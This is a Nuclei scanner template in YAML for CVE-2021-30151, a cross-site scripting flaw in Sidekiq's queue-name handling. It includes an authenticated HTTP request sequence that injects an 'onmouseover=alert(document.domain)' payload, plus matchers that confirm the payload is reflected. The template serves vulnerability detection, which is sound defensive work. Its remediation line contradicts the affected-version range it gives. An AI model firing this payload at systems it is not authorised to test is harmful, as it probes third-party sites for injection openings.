63 lines
2.0 KiB
YAML
63 lines
2.0 KiB
YAML
id: CVE-2021-30151
|
|
|
|
info:
|
|
name: Sidekiq <=6.2.0 - Cross-Site Scripting
|
|
author: DhiyaneshDk
|
|
severity: medium
|
|
description: Sidekiq through 5.1.3 and 6.x through 6.2.0 contains a cross-site scripting vulnerability via the queue name of the live-poll feature when Internet Explorer is used.
|
|
impact: |
|
|
Successful exploitation of this vulnerability could lead to unauthorized access, data theft, or session hijacking.
|
|
remediation: |
|
|
Upgrade to Sidekiq version 6.2.0 or later to mitigate this vulnerability.
|
|
reference:
|
|
- https://github.com/mperham/sidekiq/issues/4852
|
|
- https://lists.debian.org/debian-lts-announce/2022/03/msg00015.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2021-30151
|
|
- https://lists.debian.org/debian-lts-announce/2023/03/msg00011.html
|
|
- https://github.com/Elsfa7-110/kenzer-templates
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2021-30151
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00574
|
|
epss-percentile: 0.77475
|
|
cpe: cpe:2.3:a:contribsys:sidekiq:*:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 2
|
|
vendor: contribsys
|
|
product: sidekiq
|
|
shodan-query: title:"Sidekiq"
|
|
tags: cve2021,cve,xss,sidekiq,authenticated,contribsys
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
POST /api/auth HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Content-Type: application/json
|
|
|
|
{"email":"{{username}}","password":"{{password}}"}
|
|
- |
|
|
GET /queues/"onmouseover="alert(document.domain)" HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- 'onmouseover="alert(document.domain)'
|
|
- 'sidekiq'
|
|
condition: and
|
|
case-insensitive: true
|
|
|
|
- type: word
|
|
part: header
|
|
words:
|
|
- "text/html"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|
|
# digest: 490a004630440220130538944f3f1871ac5aeb68f5998d755e83750ee3dac79cd8b56281de5701bd022001daf8dcf6c2450756a9327e75db2241d0fa9df706b70d735eeb121711653abc:922c64590222798bb761d5b6d8e72950 |